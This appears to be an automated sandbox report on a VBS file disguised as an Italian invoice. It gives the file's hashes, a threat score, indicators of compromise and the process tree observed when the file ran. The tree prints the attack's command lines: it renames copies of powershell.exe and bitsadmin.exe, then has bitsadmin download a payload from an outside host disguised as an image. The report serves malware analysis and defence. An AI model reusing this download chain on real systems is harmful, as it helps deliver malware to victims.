Analysis
-
max time kernel
62s -
max time network
23s -
platform
windows7_x64 -
resource
win7 -
submitted
13-07-2020 07:25
Static task
static1
Behavioral task
behavioral1
Sample
Fatt_cliente_02567110412.vbs
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Fatt_cliente_02567110412.vbs
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
Fatt_cliente_02567110412.vbs
-
Size
3KB
-
MD5
9faef390681779584e1b8133adae555e
-
SHA1
cb3765ea99deb44f62e47c23411b19405fcc507d
-
SHA256
22c2b0edeb83c36ad3757ff81c922df3fcc124c7da452ace9e932eb0125ddc2c
-
SHA512
3faa7c7ef807d6c97b89730e5d1f0124c639addbcd96ef3f47ff0d567e7dddf34df3163bc7e0c463655f18db0e8b85ba1103c4fcc5fee3b468150056c4273cf2
Score
8/10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
WScript.exedescription pid process target process PID 1104 wrote to memory of 1112 1104 WScript.exe cmd.exe PID 1104 wrote to memory of 1112 1104 WScript.exe cmd.exe PID 1104 wrote to memory of 1112 1104 WScript.exe cmd.exe PID 1104 wrote to memory of 1424 1104 WScript.exe cmd.exe PID 1104 wrote to memory of 1424 1104 WScript.exe cmd.exe PID 1104 wrote to memory of 1424 1104 WScript.exe cmd.exe PID 1104 wrote to memory of 832 1104 WScript.exe jzFO.exe PID 1104 wrote to memory of 832 1104 WScript.exe jzFO.exe PID 1104 wrote to memory of 832 1104 WScript.exe jzFO.exe PID 1104 wrote to memory of 832 1104 WScript.exe jzFO.exe -
Executes dropped EXE 1 IoCs
Processes:
jzFO.exepid process 832 jzFO.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fatt_cliente_02567110412.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1104 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zjzFO.exe2⤵PID:1112
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\jzFO.exe2⤵PID:1424
-
C:\Users\Admin\AppData\Roaming\jzFO.exe"C:\Users\Admin\AppData\Roaming\jzFO.exe" /transfer JxfqxV /download https://mzgotech.com/temha/02567110412/uk.png C:\Users\Admin\AppData\Roaming\uk.png2⤵
- Executes dropped EXE
PID:832